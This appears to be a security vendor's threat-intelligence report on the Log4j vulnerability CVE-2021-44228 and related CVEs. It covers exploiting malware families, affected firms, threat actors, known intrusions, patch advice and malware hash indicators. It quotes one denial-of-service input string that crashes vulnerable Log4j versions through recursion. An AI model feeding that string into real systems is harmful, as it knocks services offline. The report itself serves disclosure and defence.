Special Report – Apache Log4j Vulnerability (CVE-2021-44228)

Verticals Affected: Technology, Gaming, Multiple
Victim Location: Australia, New Zealand, Europe, Latin America, Africa, Asia, North America
Related Malware Families: Muhstik, Mirai, Elknot, Kinsing, M8220, SitesLoader, XMRig, Swrort, Khonsari, Orcus, Tsunami,
Monero, WinGo, Nanocore, PowerShell ReverseShell, TellYouThePass, Dridex, Meterpreter, Wiper-rm, NjRAT, HabitsRAT

What is CVE-2021-44228?

Since early December, the Log4j vulnerability (CVE-2021-44228) has been a hot topic among the threat intelligence and malware research community. The Apache Log4j vulnerability, also known as Log4Shell or LogJam, is a vulnerability in versions 2.0 through 2.14.1 of Apache Log4j, a Java based logging tool included in many open source libraries and used in various popular software applications. The vulnerability, which is rated as a 10/10 in severity, is possible due to improper input validation and can be exploited for remote code execution (RCE) attacks to give a threat actor complete access to a victim system.

CVE-2021-44228 was first reported to the Log4j developers in November by researchers at Alibaba, and a patch was made available shortly thereafter. However, a Twitter user pointed out the attack vector was exposed at BlackHat USA in 2016. The vulnerability was used to target multiple Minecraft related sites and servers. At present, the exploit has spun off at least 60 mutations following public disclosure. Industry researchers have observed threat actors using CVE-2021-44228 to install cryptominers and Cobalt Strike beacons. Some newer mutations allow exploitation over HTTP or HTTPS.

Multiple malware families were observed exploiting CVE-2021-44228, including Muhstik, Mirai, Elknot, Kinsing, M8220, SitesLoader, XMRig, Swrort, Khonsari, Orcus, Tsunami, Monero, WinGo, Nanocore, PowerShell ReverseShell, TellYouThePass, Dofloo, Dridex, Meterpreter, Wiper-rm, and others.

Log4j is used in many external or internet-facing industrial control systems, potentially leaving critical infrastructure exposed to remote exploitation. Due to the multiple layers of dependencies found in enterprise Java environments, some organizations may be unaware they are using Log4j or what version they are using, particularly when using a third party software product leveraging the library. For this reason, there is a high likelihood Log4j will be overlooked and not patched by some end users. Therefore, it is possible this vulnerability will be exploited for years to come.

Related Exploits

Additional exploits related to Log4j were discovered in December. Industry researchers found the fix to address CVE- 2021-44228 was incomplete in certain non-default configurations. The newly discovered vulnerability, CVE-2021-45046, could allow attackers to craft malicious input data using a JNDI Lookup pattern, resulting in a denial of service (DOS) attack. Security firm Praetorian warned of a third security vulnerability in Log4j version 2.15.0 that was released to fix the initial vulnerability. Threat actors can potentially use this third vulnerability to exfiltrate sensitive data. Trend Micro later released information on yet another vulnerability, CVE-2021-45105, leading to denial of service via uncontrolled recursion in Log4j StrSubstitutor. They stated it is not a variant of CVE-2021-44228 but abuses a similar attack vector. An additional vulnerability, CVE-2021-44832, was discovered in late December. CVE-2021-44832 affects Apache Log4j2 versions 2.0- beta7 through 2.17.0 (excluding security fix releases 2.3.2 and 2.12.4), making them vulnerable to an RCE attack when the configuration uses a JDBC Appender with a JNDI LDAP data source URI, when an attacker has control of the target LDAP server.

A major bug was discovered in Log4j versions 2.8 – 2.16. If a string substitution is attempted for any reason on the following string, it will trigger an infinite recursion, and the application will crash:

${${::-${::-${::-j}}}}

Some threat actors began using novel TTPs when exploiting CVE-2021-44228. Instead of using LDAP callback URLs, some threat actors used RMI or both LDAP and RMI in a single request to maximize chances of success. So far, the threat actors observed using this technique were attempting to hijack resources to mine Monero. However, other threat actors could adopt this method. Another security research firm reportedly discovered an alternative attack vector affecting services running as localhost that are not exposed to any network or the internet. It relies on a basic Javascript WebSocket connection to trigger RCE on servers locally, via drive-by compromise. In other words, anyone with a vulnerable Log4j version can be exploited via the path of a listening server on their machine, or local network through visiting a website, and triggering the vulnerability.

A worm leveraging CVE-2021-44228, a self-propagating Mirai bot targeting Linux systems, emerged but proved to be ineffective for large scale attacks.

In early January, the threat actor group responsible for Night Sky ransomware began exploiting CVE-2021-44228 to access VMWare Horizon systems that are exposed to the internet to infect them with ransomware. PolySwarm has samples from this new campaign. Hashes are available at the end of this report.

Impact

With CVE-2021-44228 affecting a wide number of software applications used by multiple verticals worldwide, this high severity vulnerability may be used to create chaos. So far, the US has added CVE-2021-44228 to CISA’s catalog of exploited flaws, and Canada has taken its Canada Revenue Agency systems offline as a precaution. Britain’s National Cyber Security Centre, the Australian Cyber Security Centre, CERT-NZ, Germany’s Bundesamt für Sicherheit in der Informationstechnik (BSI), and CERT-FR have also issued advisories related to CVE-2021-44228.

Google reportedly discovered at least 35,863 Java packages using a vulnerable version of Log4j. Companies known to be affected by CVE-2021-44228 included Apple, Tencent, Twitter, Baidu, Steam, Minecraft, Cloudflare, Amazon, Tesla, Palo Alto Networks, IBM, Pulse Secure, Ghidra, ElasticSearch, Apache, Google, Webex, LinkedIn, Cisco, and VMware.

Industry reporting indicates state sponsored APT groups, including Hafnium, Stone Panda (APT 10), Aquatic Panda, Nemesis Kitten, Charming Kitten (APT 35), Venomous Bear (Turla), Fancy Bear (APT28), and unnamed North Korean and Turkish threat actors may be leveraging CVE-2021-44228. Financially motivated groups of Eastern European nexus, including the Conti ransomware group, are also reportedly leveraging CVE-2021-44228.

While many organizations have become victims of the Log4j vulnerability, only some have publicly acknowledged the intrusions:

• Unknown threat actors reportedly attacked the web server of the highest German tax court, the Federal Finance Court (BFH), using the Log4j vulnerability. The website was temporarily taken offline as a precaution. A spokesperson stated the threat actors did not gain access to sensitive data.
• The Belgian defense ministry announced it was the victim of an attack carried out via the Log4Shell vulnerability.
• Chinese nexus threat actor group Aquatic Panda reportedly targeted an unnamed academic institution using the vulnerability.
• Vietnamese cryptocurrency platform ONUS was targeted in early January 2022, with user data from 2 million users compromised.
• Industry reporting indicates unnamed threat actor groups have leveraged CVE-2021-44228 to steal money from bank accounts.

Mitigation

We published a mitigation strategy for log4j in December last year. In addition the following measures can help protect your organization against malware leveraging CVE-2021-44228:

• If your organization uses Log4j library, upgrade to Log4j Version 2.17.0 or later.
• Update any affected third party applications to a patched version when available.
• A blue team cheat sheet of vendor responses to CVE-2021-44228, posted by user SwitHak, is available on GitHub for reference.
• CISA has created an Apache Log4j Vulnerability Guidance page
• Use the hashes available below for detection of malware families known to exploit CVE- 2021-44228.

Malware Leveraging CVE-2021-44228 – IOCs

PolySwarm is currently tracking all new samples of malware exploiting CVE-2021-44228 and extracting host behavior, command and control network channels, and other relevant IOCs. This information is available in our datasets for enrichment purposes. Some of the samples we have include the following:

Khonsari
F2e3f685256e5f31b05fc9f9ca470f527d7fdae28fa3190c8eba179473e20789

Monero
C56860f50a23082849b6f06fb769f02d2a90753aa8e9397015d8df991c961644
7e81fc39bcc8e92a4f0c1296d38df6a10353bbe479e11e2a99a256f670aae392

WinGo
0229935d0e5be4cc737d5ce7085efe95d857419b77a3d2405f5ee44334a80ad5
Cd9077bf07eb4183aa5d7093cd32c9fddc43e2ecba91a682d666b041c39a4cd2
D63ca1f88d5ae76ad6685bab53594a2b2f396f8d4bfd2adde8cb6563d2fc6d29

TellYouThePass
1b671c42ed304dc34ba41ac9f7666a251336455894350af40f402c30afd497df
460b096aaf535b0b8f0224da0f04c7f7997c62bf715839a8012c1e1154a38984
4d15aa5d68b0e8b081c18d0ee5c06cc1758d17246a8d01b3c8ac48d1ef07610b
5c8710638fad8eeac382b0323461892a3e1a8865da3625403769a4378622077e
6ce1bebcd641892898e3a5c14931b1c85dea779578b9c6b752c0b002c6ea3791

PowerShell ReverseShell
82444084da0460b71a625154ca0bc815d7920137bbdb3463ee174b8efb234637
Be52669997419cd52e42262e5b9049cafe3fe591c8ff2d1b2380e5835b666c63

NanoCore
Bd5006ba4e4cfcf8a8b0b6da5bb30f4dd8a78beb351b814431ae8599dcf23f1b
E39fd26159d0e2b336bd97a204be39ace844ea5b770b0ada6c50dcd8666caa18

Mirai worm - Linux
E9744244461056c64fc390591729c035f3a375bc8ecfa1a0c111defa055c1273

Monero Ocean Miner/XMRig
A04a0cac9e896d12c2c50754f9a27d6127d1b7ebaafb04d45582621b6f91cc57

Dridex
Ee14add8eb5342d6c672dbff573b0737ac4f718f06d2881f9d319e6c806db770
794c18c4e796a1395683efeac67e4fcdaf03f26cc3ff4d42e541277b08a537cb
3e79102274c5d3a079fb0a70e2dfb616196ec82125e62b38c3f071bd431526f0
07d2c7e6ad2f889fc3ab3313b01f2c4fdb698a273309d9674a539bb49e935096

OrcusRAT
295aa53d4f104ee8532593b17eaf6b31b8c065de922e4507879cecb13f0d3504
86fc70d24f79a34c46ef66112ef4756639fcad2f2d7288e0eeb0448ffab90428

M8220
10fad59b071db09aafcb7f40e775f28180aed182786557e9ee7f2f2e332b4513

Meterpreter
07d2c7e6ad2f889fc3ab3313b01f2c4fdb698a273309d9674a539bb49e935096

Wiper-rm
41e7cee6b5534a0e8633be51f8a3bb37d439f0ccd8893ed67dcbe6be7dda2e48

Kinsing
6e25ad03103a1a972b78c642bac09060fa79c460011dc5748cbb433cc459938b
7e9663f87255ae2ff78eb882efe8736431368f341849fec000543f027bdb4512
8933820cf2769f6e7f1a711e188f551c3d5d3843c52167a34ab8d6eabb0a63ef
c38c21120d8c17688f9aeb2af5bdafb6b75e1d2673b025b720e50232f888808a

Charming Kitten (APT from Iran)
Bdf347ce89860bdde9e0b4eba3673fbcb0c5a521e4887b620106dc73650358da
1223c3ed0c877c49f032a47c62ca63a9599ab21952ce19c9e9a892cc6a8a5531
1604e69d17c0f26182a3e3ff65694a49450aafd56a7e8b21697a932409dfd81e
2bc46b0362fa7f8f658ce472958a70385b772ab9361625edc0a730211629a3c4
38fb99ff637003fdcde7b26c40750757e4499ec106c3bab12aa528bc2a67a8f5
43ad88aeed362ea9a84b936e6aa58b75ab3a55ee968f7afce7010003317a340a
8aa3530540ba023fb29550643beb00c9c29f81780056e02c5a0d02a1797b9cd9
Ac2235137a347e373db62c083b90106164554178c354364bde2f89178dc11ac4
Bdf347ce89860bdde9e0b4eba3673fbcb0c5a521e4887b620106dc73650358da
D3aa8d62d7d5ed924eafb9fbfac39eafdb62ce7d804cc62385622faddf72a5fd

Elknot
90ee1a8e8f0ea5085b83b8efe174674a93260b599729bf53e1b140e2acc7d26f

SitesLoader
E7c5b3de93a3184dc99c98c7f45e6ff5f6881b15d4a56c144e2e53e96dcc0e82
f059246cea87a886acb1938809cf4a1152247a5b5a2df0b1bf64c46a0daccbcc

Night Sky Ransomware
8c1a72991fb04dc3a8cf89605fb85150ef0e742472a0c58b8fa942a1f04877b0
8c1a72991fb04dc3a8cf89605fb85150ef0e742472a0c58b8fa942a1f04877b0
A077a55608ced7cea2bd92e2ce7e43bf51076304990ec7bb40c2b384ce2e5283
1fca1cd04992e0fcaa714d9dfa97323d81d7e3d43a024ec37d1c7a2767a17577
8c1a72991fb04dc3a8cf89605fb85150ef0e742472a0c58b8fa942a1f04877b0

source: https://polyswarm.network/